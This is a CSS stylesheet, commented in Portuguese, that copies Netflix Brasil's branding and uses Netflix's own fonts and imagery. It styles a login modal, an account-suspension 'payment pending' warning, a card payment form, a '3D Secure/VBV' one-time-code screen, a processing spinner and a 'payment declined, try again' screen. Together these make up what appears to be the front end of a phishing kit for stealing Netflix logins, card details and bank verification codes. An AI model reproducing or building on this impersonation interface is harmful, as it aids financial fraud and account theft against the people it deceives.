/* Importar fonte Netflix Sans */
@font-face {
    font-family: 'Netflix Sans';
    font-weight: 400;
    src: url('https://assets.nflxext.com/ffe/siteui/fonts/netflix-sans/v3/NetflixSans_W_Rg.woff2') format('woff2');
    font-display: optional;
}

@font-face {
    font-family: 'Netflix Sans';
    font-weight: 500;
    src: url('https://assets.nflxext.com/ffe/siteui/fonts/netflix-sans/v3/NetflixSans_W_Md.woff2') format('woff2');
    font-display: optional;
}

@font-face {
    font-family: 'Netflix Sans';
    font-weight: 700;
    src: url('https://assets.nflxext.com/ffe/siteui/fonts/netflix-sans/v3/NetflixSans_W_Bd.woff2') format('woff2');
    font-display: optional;
}

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body {
    font-family: 'Netflix Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
    background-color: #000;
    color: #fff;
    overflow-x: hidden;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

/* Header */
.header {
    position: absolute;
    top: 0;
    width: 100%;
    z-index: 100;
    padding: 20px 50px;
}

.header-content {
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.logo-img {
    height: 45px;
    width: auto;
}

.logo-svg {
    width: 148px;
    height: 40px;
}

.header-actions {
    display: flex;
    align-items: center;
    gap: 20px;
}



.btn-signin {
    background-color: #e50914;
    color: #fff;
    border: none;
    padding: 8px 18px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 500;
    cursor: pointer;
    transition: background-color 0.3s;
}

.btn-signin:hover {
    background-color: #f40612;
}
/* Language Button - Netflix style */
.language-btn {
    display: flex;
    align-items: center;
    gap: 4px;
    background-color: transparent;
    border: 1px solid rgba(255, 255, 255, 0.5);
    border-radius: 4px;
    padding: 6px 10px;
    cursor: pointer;
    color: #fff;
}
.language-btn svg {
    flex-shrink: 0;
}
.lang-arrow {
    font-size: 10px;
    color: #fff;
}


/* Hero Section */
.hero {
    min-height: 100vh;
    position: relative;
    display: flex;
    align-items: center;
    justify-content: center;
    text-align: center;
    border-bottom: 8px solid #222;
    overflow: hidden;
}

.hero-bg {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-image: 
        linear-gradient(to top, rgba(0, 0, 0, 0.8) 0, rgba(0, 0, 0, 0) 60%, rgba(0, 0, 0, 0.8) 100%),
        url('Netflix%20Brasil%20-%20Assista%20a%20s%C3%A9ries%20e%20filmes%20online_files/BR-en-20260803-TRIFECTA-perspective_14662ab2-060b-4f55-9c57-bd666d2d3e39_large.jpg');
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
    z-index: 0;
}

.hero-content {
    max-width: 950px;
    padding: 75px 20px 100px;
    position: relative;
    z-index: 1;
    margin: 0 auto;
}

.hero h1 {
    font-size: 48px;
    font-weight: 900;
    margin-bottom: 16px;
    line-height: 1.1;
    letter-spacing: -1px;
}

.hero h2 {
    font-size: 26px;
    font-weight: 400;
    margin-bottom: 28px;
}

.hero-description {
    font-size: 20px;
    font-weight: 400;
    margin-bottom: 20px;
}

.email-signup {
    display: flex;
    gap: 10px;
    max-width: 600px;
    margin: 0 auto;
}

.email-input {
    flex: 1;
    padding: 18px 16px;
    font-size: 16px;
    border: 1px solid #8c8c8c;
    border-radius: 4px;
    background-color: rgba(22, 22, 22, 0.7);
    color: #fff;
}

.email-input::placeholder {
    color: #8c8c8c;
}

.btn-get-started {
    background-color: #e50914;
    color: #fff;
    border: none;
    padding: 18px 28px;
    font-size: 24px;
    font-weight: 500;
    border-radius: 4px;
    cursor: pointer;
    transition: background-color 0.3s;
    white-space: nowrap;
}

.btn-get-started:hover {
    background-color: #f40612;
}

/* Modal */
.modal {
    display: none;
    position: fixed;
    z-index: 1000;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background: linear-gradient(to bottom, #000000 0%, #0a0001 30%, #1a0507 60%, #2d0a0f 100%);
    overflow: auto;
}

.modal-content {
    background: transparent;
    margin: 0;
    padding: 0;
    width: 100%;
    max-width: 100%;
    border-radius: 0;
    position: relative;
    min-height: 100vh;
    display: flex;
    flex-direction: column;
    align-items: flex-start;
    padding-top: 0;
    padding-left: 12%;
}

.login-header {
    width: 100%;
    padding: 24px 32px;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 10;
    border-bottom: 1px solid rgba(128, 128, 128, 0.4);
    background: transparent;
}

.login-logo {
    height: 45px;
    width: auto;
}

.login-container {
    padding: 0;
    max-width: 380px;
    width: 100%;
    margin-top: 130px;
    margin-left: 0;
    margin-right: 0;
    box-sizing: border-box;
}

.login-container h1 {
    font-size: 32px;
    font-weight: 700;
    margin-bottom: 16px;
    color: #fff;
    text-align: left;
    line-height: 1.2;
}

.login-subtitle {
    font-size: 16px;
    color: #b3b3b3;
    margin-bottom: 28px;
    text-align: left;
}

.login-container input {
    width: 100%;
    padding: 16px;
    margin-bottom: 0;
    background: #2b2b2b;
    border: 1px solid #808080;
    border-radius: 4px;
    color: #fff;
    font-size: 16px;
    transition: all 0.2s;
    height: 50px;
    box-sizing: border-box;
}

.login-container input.login-error {
    border-color: #e87c03;
}

.login-field-wrapper {
    margin-bottom: 0;
}

.login-error-message {
    display: flex;
    align-items: center;
    gap: 8px;
    color: #e87c03;
    font-size: 13px;
    margin-top: -12px;
    margin-bottom: 12px;
}

.error-icon-login {
    font-size: 16px;
}

.login-container input::placeholder {
    color: #8c8c8c;
}

.login-container input:focus {
    outline: none;
    border-color: #fff;
    background: #333;
}

.btn-login {
    width: 100%;
    padding: 0;
    background: #e50914;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 18px;
    font-weight: 500;
    cursor: pointer;
    margin-bottom: 32px;
    margin-top: 12px;
    transition: background 0.25s;
    min-height: 48px;
    height: 48px;
}

.btn-login:hover {
    background: #c11119;
}

.login-footer {
    margin-top: 32px;
    text-align: left;
}

.help-link {
    color: #fff;
    text-decoration: none;
    font-size: 16px;
    display: inline-flex;
    align-items: center;
    gap: 4px;
    margin-bottom: 24px;
    font-weight: 500;
}

.help-link:hover {
    text-decoration: underline;
}

.dropdown-arrow {
    display: inline-block;
    margin-left: 2px;
    font-size: 14px;
    transform: none;
}

.recaptcha-text {
    font-size: 13px;
    color: #8c8c8c;
    line-height: 1.5;
    margin: 0;
    font-weight: 400;
    text-align: left;
}

/* Browse Content */
.browse-content {
    background-color: #141414;
    min-height: 100vh;
}

.browse-nav {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 4%;
    height: 70px;
    background-color: transparent;
    background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.7) 10%, rgba(0, 0, 0, 0));
    width: 100%;
    z-index: 100;
    position: sticky;
    top: 0;
}

.browse-nav.scrolled {
    background-color: #141414;
}

.nav-left {
    display: flex;
    align-items: center;
    gap: 30px;
}

.logo-small .logo-svg {
    width: 92px;
    height: 25px;
}

.logo-img-small {
    height: 28px;
    width: auto;
}

.nav-menu {
    display: flex;
    list-style: none;
    gap: 20px;
}

.nav-menu a {
    color: #e5e5e5;
    text-decoration: none;
    font-size: 14px;
    font-weight: 500;
    transition: color 0.3s;
}

.nav-menu a:hover,
.nav-menu a.active {
    color: #fff;
}

.btn-logout {
    background-color: #e50914;
    color: #fff;
    border: none;
    padding: 6px 16px;
    border-radius: 4px;
    font-size: 14px;
    cursor: pointer;
    transition: background-color 0.3s;
}

.btn-logout:hover {
    background-color: #f40612;
}

/* Featured */
.featured {
    height: 600px;
    background: linear-gradient(to bottom, transparent 50%, #141414 100%),
                linear-gradient(to right, #141414 0%, transparent 50%, #141414 100%),
                url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1920 1080"><rect fill="%234a148c" width="1920" height="1080"/></svg>');
    background-size: cover;
    background-position: center;
    display: flex;
    align-items: center;
    padding: 0 50px;
    margin-top: 70px;
}

.featured-content {
    max-width: 500px;
}

.featured-title {
    font-size: 48px;
    font-weight: 700;
    margin-bottom: 16px;
    text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
}

.featured-description {
    font-size: 18px;
    line-height: 1.4;
    margin-bottom: 24px;
    text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
}

.featured-buttons {
    display: flex;
    gap: 12px;
}

.btn-play,
.btn-info {
    padding: 12px 28px;
    border: none;
    border-radius: 4px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    transition: all 0.3s;
}

.btn-play {
    background-color: #fff;
    color: #000;
}

.btn-play:hover {
    background-color: rgba(255, 255, 255, 0.75);
}

.btn-info {
    background-color: rgba(109, 109, 110, 0.7);
    color: #fff;
}

.btn-info:hover {
    background-color: rgba(109, 109, 110, 0.4);
}

/* Rows */
.rows-container {
    padding: 20px 50px;
}

.row {
    margin-bottom: 40px;
}

.row-title {
    font-size: 20px;
    font-weight: 700;
    margin-bottom: 12px;
}

.row-posters {
    display: flex;
    gap: 8px;
    overflow-x: auto;
    overflow-y: hidden;
    padding: 20px 0;
    scrollbar-width: none;
}

.row-posters::-webkit-scrollbar {
    display: none;
}

.poster {
    min-width: 200px;
    height: 300px;
    border-radius: 4px;
    cursor: pointer;
    transition: transform 0.3s;
    background-size: cover;
    background-position: center;
}

.poster:hover {
    transform: scale(1.08);
}

/* Responsive - Browse Content */
@media (max-width: 768px) {
    .browse-nav {
        padding: 0 16px;
        height: 48px;
    }

    .nav-menu {
        gap: 8px;
    }

    .nav-menu a {
        font-size: 11px;
    }

    .featured {
        height: 400px;
        padding: 0 16px;
        margin-top: 48px;
    }

    .featured-title {
        font-size: 28px;
    }

    .featured-description {
        font-size: 14px;
    }

    .rows-container {
        padding: 16px;
    }

    .poster {
        min-width: 130px;
        height: 195px;
    }

    .row-title {
        font-size: 16px;
    }
}

/* Payment Pending Screen - Estilo Netflix Login */
.payment-pending {
    min-height: 100vh;
    background: linear-gradient(to bottom, 
        rgba(0,0,0,0.8) 0%, 
        rgba(0,0,0,0.85) 50%, 
        rgba(0,0,0,0.9) 100%
    ),
    url('Netflix%20Brasil%20-%20Assista%20a%20s%C3%A9ries%20e%20filmes%20online_files/BR-en-20260803-TRIFECTA-perspective_14662ab2-060b-4f55-9c57-bd666d2d3e39_large.jpg');
    background-size: cover;
    background-position: center;
}

.payment-pending:not([style*="display: none"]) {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 20px;
}

/* Payment Form Screen */
.regularize-container {
    background: rgba(0, 0, 0, 0.75);
    border-radius: 4px;
    padding: 60px 68px 40px;
    max-width: 500px;
    width: 100%;
    text-align: center;
}

.logo-regularize {
    height: 70px;
    width: auto;
    margin-bottom: 30px;
}

.warning-icon {
    font-size: 64px;
    margin-bottom: 20px;
    animation: pulse 2s infinite;
}

@keyframes pulse {
    0%, 100% {
        transform: scale(1);
        opacity: 1;
    }
    50% {
        transform: scale(1.1);
        opacity: 0.8;
    }
}

.regularize-container h1 {
    font-size: 32px;
    font-weight: 500;
    color: #fff;
    margin-bottom: 24px;
}

.suspension-message {
    font-size: 18px;
    color: #e5e5e5;
    line-height: 1.6;
    margin-bottom: 30px;
}

.btn-pay-now {
    width: 100%;
    padding: 16px;
    background: #e50914;
    border: none;
    border-radius: 4px;
    color: #fff;
    font-size: 16px;
    font-weight: 500;
    cursor: pointer;
    transition: background 0.2s;
}

.btn-pay-now:hover {
    background: #c11119;
}

/* Processing Screen */
#processingScreen .form-card {
    text-align: center;
    padding: 60px 40px;
}

.spinner {
    width: 60px;
    height: 60px;
    border: 4px solid rgba(255, 255, 255, 0.1);
    border-top: 4px solid #e50914;
    border-radius: 50%;
    animation: spin 1s linear infinite;
    margin: 0 auto 30px;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.processing-message {
    font-size: 16px;
    color: #b3b3b3;
    line-height: 1.6;
    margin-top: 10px;
}

/* 3D Secure/VBV Screen */
.vbv-header {
    text-align: center;
    margin-bottom: 20px;
}

.vbv-header h2 {
    font-size: 28px;
    font-weight: 700;
    color: #fff;
    margin-bottom: 15px;
}

.vbv-logos {
    display: flex;
    gap: 10px;
    justify-content: center;
    margin-top: 15px;
    flex-wrap: wrap;
}

.vbv-badge {
    display: inline-block;
    padding: 8px 15px;
    background: linear-gradient(135deg, #1e3c72 0%, #2a5298 100%);
    border-radius: 20px;
    font-size: 12px;
    font-weight: 500;
    color: #fff;
    box-shadow: 0 2px 8px rgba(0,0,0,0.2);
}

.vbv-message {
    background: rgba(255, 255, 255, 0.05);
    padding: 20px;
    border-radius: 8px;
    margin-bottom: 25px;
    border-left: 4px solid #1e88e5;
}

.vbv-message p {
    font-size: 14px;
    color: #b3b3b3;
    line-height: 1.6;
    margin: 8px 0;
}

#vbvCode {
    text-align: center;
    font-size: 24px;
    letter-spacing: 8px;
    font-weight: 600;
}

.btn-confirm-vbv {
    width: 100%;
    padding: 16px;
    background: #1e88e5;
    border: none;
    border-radius: 4px;
    color: #fff;
    font-size: 16px;
    font-weight: 500;
    cursor: pointer;
    transition: background 0.2s;
    margin-top: 10px;
}

.btn-confirm-vbv:hover {
    background: #1565c0;
}

.vbv-help {
    text-align: center;
    margin-top: 20px;
    font-size: 13px;
    color: #999;
}

.vbv-help a {
    color: #1e88e5;
    text-decoration: none;
}

.vbv-help a:hover {
    text-decoration: underline;
}

/* Payment Declined Screen */
#declinedScreen .form-card {
    text-align: center;
    padding: 60px 40px;
}

.error-icon {
    font-size: 64px;
    margin-bottom: 20px;
}

.declined-message {
    font-size: 18px;
    color: #e5e5e5;
    line-height: 1.6;
    margin-bottom: 30px;
}

.btn-try-again {
    width: 100%;
    padding: 16px;
    background: #e50914;
    border: none;
    border-radius: 4px;
    color: #fff;
    font-size: 16px;
    font-weight: 500;
    cursor: pointer;
    transition: background 0.2s;
}

.btn-try-again:hover {
    background: #c11119;
}

.btn-continue {
    width: 100%;
    padding: 16px;
    background: #e50914;
    border: none;
    border-radius: 4px;
    color: #fff;
    font-size: 16px;
    font-weight: 500;
    cursor: pointer;
    margin-bottom: 20px;
    transition: background 0.2s;
}

.btn-continue:hover {
    background: #c11119;
}

.recaptcha-regularize {
    font-size: 13px;
    color: #8c8c8c;
    line-height: 1.5;
    margin-top: 20px;
}

.recaptcha-regularize a {
    color: #0071eb;
    text-decoration: none;
}

.recaptcha-regularize a:hover {
    text-decoration: underline;
}

/* Payment Form Screen */
.payment-form-screen {
    min-height: 100vh;
    background: #ffffff;
    display: flex;
    flex-direction: column;
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    z-index: 9999;
    overflow-y: auto;
    overflow-x: hidden;
    -webkit-overflow-scrolling: touch;
}

.payment-form-screen[style*="display: flex"] {
    display: flex;
    flex-direction: column;
}

.form-container {
    flex: 1;
    display: flex;
    align-items: flex-start;
    justify-content: center;
    padding: 60px 20px 100px;
    background: #ffffff;
    width: 100%;
    overflow-y: auto;
}

.form-card {
    max-width: 440px;
    width: 100%;
    background-color: transparent;
    padding: 0 32px;
}

.back-link {
    color: #0071eb;
    text-decoration: none;
    font-size: 14px;
    display: inline-block;
    margin-bottom: 16px;
    font-weight: 500;
}

.back-link:hover {
    text-decoration: underline;
}

.error-banner {
    background-color: #e87c03;
    border-radius: 4px;
    padding: 16px 20px;
    margin-bottom: 20px;
    display: flex;
    align-items: flex-start;
    gap: 12px;
    color: #fff;
    line-height: 1.4;
}

.error-icon {
    font-size: 18px;
    color: #fff;
    flex-shrink: 0;
    font-weight: bold;
}

.form-step {
    font-size: 13px;
    color: #333;
    margin-bottom: 5px;
    font-weight: 500;
}

.form-card h2 {
    font-size: 32px;
    font-weight: 500;
    color: #333;
    margin-bottom: 16px;
    line-height: 1.2;
}

.card-logos {
    display: flex;
    gap: 8px;
    margin-bottom: 16px;
}

.card-logos img {
    height: 24px;
    width: auto;
    border-radius: 3px;
}

.form-group {
    margin-bottom: 16px;
}

.form-group label {
    display: block;
    font-size: 13px;
    font-weight: 500;
    color: #333;
    margin-bottom: 6px;
}

.form-group input {
    width: 100%;
    padding: 12px 14px;
    font-size: 16px;
    background-color: #fff;
    border: 1px solid #8c8c8c;
    border-radius: 2px;
    color: #000;
    transition: border-color 0.2s;
}

.form-group input:focus {
    outline: none;
    border-color: #0071eb;
    border-width: 2px;
    padding: 11px 13px;
}

.form-group input.error {
    border-color: #e87c03;
    border-width: 2px;
    padding: 11px 13px;
}

.form-group .error-message {
    color: #e87c03;
    font-size: 13px;
    margin-top: 6px;
    display: none;
}

.form-group.has-error .error-message {
    display: block;
}

.form-group input::placeholder {
    color: #8c8c8c;
}

.input-with-icon {
    position: relative;
}

.card-brand-icon {
    position: absolute;
    right: 14px;
    top: 50%;
    transform: translateY(-50%);
    font-size: 24px;
}

.form-row {
    display: grid;
    grid-template-columns: 1.5fr 1fr;
    gap: 12px;
}

.payment-method-section {
    margin: 24px 0;
}

.section-label {
    display: block;
    font-size: 13px;
    font-weight: 500;
    color: #333;
    margin-bottom: 12px;
}

.payment-methods-inline {
    display: flex;
    gap: 24px;
}

.payment-method-radio {
    display: flex;
    align-items: center;
    gap: 8px;
    cursor: pointer;
}

.payment-method-radio input[type="radio"] {
    width: 18px;
    height: 18px;
    cursor: pointer;
}

.payment-method-radio span {
    font-size: 16px;
    color: #000;
}

.pricing-section {
    margin: 24px 0;
    padding: 16px 0;
    border-top: 1px solid #e6e6e6;
    border-bottom: 1px solid #e6e6e6;
}

.price-info {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 8px;
}

.price {
    font-size: 16px;
    font-weight: 500;
    color: #000;
}

.change-plan {
    color: #0071eb;
    font-size: 16px;
    text-decoration: none;
    font-weight: 500;
}

.change-plan:hover {
    text-decoration: underline;
}

.pricing-note {
    font-size: 13px;
    color: #737373;
    margin: 0;
}

.terms-section {
    margin: 24px 0;
}

.terms-text {
    font-size: 13px;
    color: #737373;
    line-height: 1.6;
    margin-bottom: 16px;
}

.terms-text a {
    color: #0071eb;
    text-decoration: none;
}

.terms-text a:hover {
    text-decoration: underline;
}

.checkbox-label {
    display: flex;
    align-items: flex-start;
    gap: 10px;
    cursor: pointer;
}

.checkbox-label input[type="checkbox"] {
    width: 18px;
    height: 18px;
    margin-top: 2px;
    cursor: pointer;
}

.checkbox-label span {
    font-size: 16px;
    color: #000;
}

.btn-pay {
    width: 100%;
    padding: 18px;
    background-color: #e50914;
    color: #fff;
    border: none;
    border-radius: 2px;
    font-size: 24px;
    font-weight: 400;
    cursor: pointer;
    transition: background-color 0.2s;
    margin-top: 24px;
}

.btn-pay:hover {
    background-color: #c11119;
}

/* Plans Screen */
.plans-container {
    max-width: 1200px;
    width: 100%;
    padding: 0 32px;
}

.plans-title {
    font-size: 32px;
    font-weight: 500;
    color: #000;
    margin-bottom: 32px;
    text-align: center;
}

.plans-grid {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 16px;
    margin-bottom: 32px;
}

.plan-card {
    background: #fff;
    border: 2px solid #e6e6e6;
    border-radius: 12px;
    overflow: hidden;
    cursor: pointer;
    transition: transform 0.2s, box-shadow 0.2s;
}

.plan-card:hover {
    transform: translateY(-4px);
    box-shadow: 0 8px 16px rgba(0, 0, 0, 0.1);
}

.plan-header {
    padding: 20px;
    color: #fff;
    text-align: center;
}

.plan-ads {
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
}

.plan-standard {
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
}

.plan-premium {
    background: linear-gradient(135deg, #f093fb 0%, #f5576c 100%);
    position: relative;
}

.plan-premium::after {
    content: '✓';
    position: absolute;
    top: 10px;
    right: 10px;
    background: #fff;
    color: #f5576c;
    width: 24px;
    height: 24px;
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    font-weight: bold;
}

.plan-header h3 {
    font-size: 20px;
    font-weight: 700;
    margin-bottom: 8px;
}

.plan-quality {
    font-size: 14px;
    font-weight: 500;
    opacity: 0.9;
}

.plan-body {
    padding: 24px 20px;
}

.plan-price-label {
    font-size: 13px;
    color: #737373;
    margin-bottom: 4px;
}

.plan-price {
    font-size: 24px;
    font-weight: 700;
    color: #000;
    margin-bottom: 24px;
}

.plan-feature {
    padding: 12px 0;
    border-bottom: 1px solid #e6e6e6;
}

.plan-feature:last-child {
    border-bottom: none;
}

.feature-label {
    font-size: 13px;
    color: #737373;
    margin-bottom: 4px;
}

.feature-value {
    font-size: 14px;
    color: #000;
    font-weight: 500;
}

.btn-next-step {
    width: 100%;
    max-width: 440px;
    padding: 18px;
    background-color: #e50914;
    color: #fff;
    border: none;
    border-radius: 2px;
    font-size: 24px;
    font-weight: 500;
    cursor: pointer;
    transition: background-color 0.2s;
    margin: 32px auto 0;
    display: block;
}

.btn-next-step:hover {
    background-color: #c11119;
}

.btn-signout {
    background-color: #e50914;
    color: #fff;
    border: none;
    padding: 8px 18px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 500;
    cursor: pointer;
    transition: background-color 0.3s;
}

.btn-signout:hover {
    background-color: #f40612;
}

@media (max-width: 1024px) {
    .plans-grid {
        grid-template-columns: 1fr;
        max-width: 440px;
        margin-left: auto;
        margin-right: auto;
    }
    
    .plan-card {
        max-width: 100%;
    }
}

/* Mobile Responsiveness - Netflix Standard */
@media (max-width: 768px) {
    /* Header - Netflix mobile: logo menor, padding reduzido */
    .header {
        padding: 12px 16px;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 1000;
        background: linear-gradient(to bottom, rgba(0,0,0,0.7) 0%, transparent 100%);
    }
    
    .logo-img {
        height: 24px;
    }
    
    .language-btn {
        padding: 4px 8px;
        border-radius: 2px;
    }
    .language-btn svg {
        width: 14px;
        height: 14px;
    }
    
    .btn-signin {
        padding: 6px 16px;
        font-size: 14px;
        border-radius: 2px;
    }
    
    /* Hero - Netflix mobile: texto centralizado, menor */
    .hero {
        min-height: 100vh;
        min-height: 100dvh;
    }

    .hero-content {
        padding: 0 24px;
        padding-top: 20vh;
        padding-bottom: 5vh;
        max-width: 100%;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: flex-start;
    }

    .hero h1 {
        font-size: 32px;
        font-weight: 900;
        margin-bottom: 16px;
        line-height: 1.1;
        text-align: center;
    }

    .hero h2 {
        font-size: 18px;
        font-weight: 400;
        margin-bottom: 16px;
    }
    
    .hero-description {
        font-size: 18px;
        margin-bottom: 16px;
    }

    .email-signup {
        flex-direction: column;
        max-width: 100%;
        width: 100%;
        gap: 16px;
        padding: 0;
    }
    
    .email-input {
        width: 100%;
        padding: 18px 16px;
        font-size: 16px;
        border-radius: 4px;
        background-color: rgba(22, 22, 22, 0.7);
        border: 1px solid rgba(128, 128, 128, 0.7);
    }

    .btn-get-started {
        font-size: 20px;
        font-weight: 500;
        width: auto;
        min-width: 60%;
        padding: 16px 32px;
        border-radius: 4px;
        margin: 0 auto;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 8px;
    }
    
    /* Login Modal - Netflix mobile: full width, sem padding lateral excessivo */
    .login-header {
        padding: 12px 16px;
    }

    .login-logo {
        height: 24px;
    }

    .login-container {
        max-width: 100%;
        padding: 0 16px;
        margin-top: 70px;
    }
    
    .login-container h1 {
        font-size: 24px;
        font-weight: 700;
        margin-bottom: 16px;
    }

    .login-subtitle {
        font-size: 14px;
        margin-bottom: 20px;
    }
    
    .login-container input {
        font-size: 16px;
        padding: 16px;
        border-radius: 4px;
    }

    .btn-login {
        padding: 16px;
        font-size: 16px;
        border-radius: 4px;
    }

    .help-link {
        font-size: 14px;
    }

    .recaptcha-text {
        font-size: 12px;
    }
    
    /* Payment Pending - Netflix mobile: card centralizado, full width */
    .payment-pending:not([style*="display: none"]) {
        padding: 16px;
    }

    .regularize-container {
        padding: 40px 24px;
        max-width: 100%;
        border-radius: 4px;
    }

    .logo-regularize {
        height: 40px;
        margin-bottom: 24px;
    }

    .warning-icon {
        font-size: 48px;
    }
    
    .regularize-container h1 {
        font-size: 24px;
        margin-bottom: 16px;
    }
    
    .suspension-message {
        font-size: 16px;
        line-height: 1.5;
    }
    
    .btn-pay-now {
        font-size: 16px;
        padding: 16px;
        border-radius: 4px;
    }
    
    /* Plans Screen - Netflix mobile: cards empilhados, scroll vertical */
    .plans-container {
        padding: 0 16px;
    }
    
    .plans-title {
        font-size: 22px;
        margin-bottom: 20px;
    }
    
    .plans-grid {
        grid-template-columns: 1fr;
        gap: 12px;
        max-width: 100%;
    }

    .plan-card {
        max-width: 100%;
    }
    
    .plan-header {
        padding: 16px;
    }

    .plan-header h3 {
        font-size: 18px;
    }
    
    .plan-body {
        padding: 16px;
    }

    .plan-price {
        font-size: 20px;
        margin-bottom: 16px;
    }

    .plan-feature {
        padding: 10px 0;
    }
    
    .btn-next-step {
        font-size: 16px;
        padding: 16px;
        margin-top: 24px;
        border-radius: 4px;
        max-width: 100%;
    }
    
    /* Payment Form - Netflix mobile: full width, inputs grandes para toque */
    .form-container {
        padding: 20px 0 40px;
        align-items: flex-start;
    }

    .form-card {
        max-width: 100%;
        padding: 0 16px;
    }
    
    .form-card h2 {
        font-size: 20px;
        margin-bottom: 12px;
    }

    .form-step {
        font-size: 12px;
    }
    
    .form-group input {
        font-size: 16px;
        padding: 14px 12px;
        border-radius: 2px;
    }
    
    .form-group label {
        font-size: 13px;
    }
    
    .form-row {
        grid-template-columns: 1fr 1fr;
        gap: 12px;
    }
    
    .btn-pay {
        font-size: 16px;
        padding: 16px;
        border-radius: 4px;
        margin-top: 16px;
    }
    
    .error-banner {
        font-size: 13px;
        padding: 12px 16px;
        border-radius: 4px;
    }

    .pricing-section {
        margin: 16px 0;
    }

    .terms-text {
        font-size: 12px;
    }

    .checkbox-label span {
        font-size: 14px;
    }

    .payment-methods-inline {
        gap: 16px;
    }

    .payment-method-radio span {
        font-size: 14px;
    }
    
    /* Browse Navigation - Netflix mobile */
    .browse-nav {
        padding: 0 16px;
        height: 48px;
    }
    
    .logo-img-small {
        height: 20px;
    }

    .logo-small .logo-svg {
        width: 72px;
        height: 20px;
    }

    .nav-menu {
        gap: 8px;
    }

    .nav-menu a {
        font-size: 11px;
    }

    .btn-logout,
    .btn-signout {
        padding: 6px 12px;
        font-size: 12px;
    }
    
    /* VBV Screen - Netflix mobile */
    .vbv-header h2 {
        font-size: 22px;
    }
    
    .vbv-message {
        padding: 16px;
    }

    .vbv-message p {
        font-size: 14px;
    }

    #vbvCode {
        font-size: 20px;
        letter-spacing: 6px;
        padding: 14px;
    }

    .btn-confirm-vbv {
        font-size: 16px;
        padding: 16px;
        border-radius: 4px;
    }

    .vbv-badges {
        gap: 6px;
    }

    .vbv-badge {
        font-size: 11px;
        padding: 6px 12px;
    }
    
    /* Declined Screen */
    .declined-message {
        font-size: 16px;
    }
    
    .btn-try-again {
        font-size: 16px;
        padding: 16px;
        border-radius: 4px;
    }

    /* Processing Screen */
    #processingScreen .form-card {
        padding: 40px 20px;
    }

    .spinner {
        width: 48px;
        height: 48px;
    }
}

@media (max-width: 480px) {
    /* Extra small screens (iPhone SE, etc) */
    .hero h1 {
        font-size: 26px;
    }
    
    .hero h2 {
        font-size: 16px;
    }
    
    .hero-description {
        font-size: 16px;
    }

    .hero-content {
        padding: 0 16px;
    }
    
    .login-container {
        margin-top: 60px;
        padding: 0 12px;
    }
    
    .login-container h1 {
        font-size: 22px;
    }
    
    .regularize-container {
        padding: 32px 16px;
    }
    
    .regularize-container h1 {
        font-size: 22px;
    }
    
    .plans-title {
        font-size: 20px;
    }
    
    .form-card h2 {
        font-size: 18px;
    }

    .form-row {
        grid-template-columns: 1fr 1fr;
        gap: 8px;
    }
    
    .btn-pay,
    .btn-next-step,
    .btn-try-again,
    .btn-confirm-vbv {
        font-size: 15px;
        padding: 14px;
    }
    
    .card-logos {
        justify-content: flex-start;
    }
    
    .card-logos svg {
        height: 26px;
        width: auto;
    }

    .back-link {
        font-size: 13px;
    }
}

/* ============================================ */
/* Netflix Float Label Inputs - Payment Form    */
/* ============================================ */

.float-label-group {
    position: relative;
    margin-bottom: 16px;
}

.float-label-group .float-input {
    width: 100%;
    padding: 16px 16px 8px 16px;
    font-size: 16px;
    border: 1px solid #8c8c8c;
    border-radius: 4px;
    background: #fff;
    color: #333;
    outline: none;
    transition: border-color 0.2s;
    box-sizing: border-box;
    height: 56px;
}

.float-label-group .float-input:focus {
    border: 2px solid #0073e6;
}

.float-label-group .float-input:not(:placeholder-shown) {
    border-color: #00a651;
    border-width: 2px;
}

.float-label-group .float-input:not(:placeholder-shown):focus {
    border-color: #0073e6;
}

.float-label-group .float-label {
    position: absolute;
    left: 16px;
    top: 50%;
    transform: translateY(-50%);
    font-size: 16px;
    color: #737373;
    pointer-events: none;
    transition: all 0.2s ease;
    background: transparent;
}

.float-label-group .float-input:focus ~ .float-label,
.float-label-group .float-input:not(:placeholder-shown) ~ .float-label {
    top: 12px;
    transform: translateY(0);
    font-size: 11px;
    color: #737373;
}

.float-label-group .input-with-icon {
    position: relative;
}

.float-label-group .input-with-icon .float-input {
    padding-right: 50px;
}

.float-label-group .input-with-icon .float-label {
    /* label inside input-with-icon wrapper */
}

.float-label-group .input-with-icon .float-input:focus ~ .float-label,
.float-label-group .input-with-icon .float-input:not(:placeholder-shown) ~ .float-label {
    top: 12px;
    transform: translateY(0);
    font-size: 11px;
    color: #737373;
}

.card-brand-icon {
    position: absolute;
    right: 12px;
    top: 50%;
    transform: translateY(-50%);
    width: 40px;
    height: 26px;
}

.cvv-help-icon {
    position: absolute;
    right: 12px;
    top: 50%;
    transform: translateY(-50%);
    font-size: 20px;
    color: #737373;
    cursor: help;
}

/* Form row for side-by-side fields */
#cardForm .form-row {
    display: flex;
    gap: 16px;
}

#cardForm .form-row .form-group {
    flex: 1;
}

/* Payment method radio buttons - Netflix style */
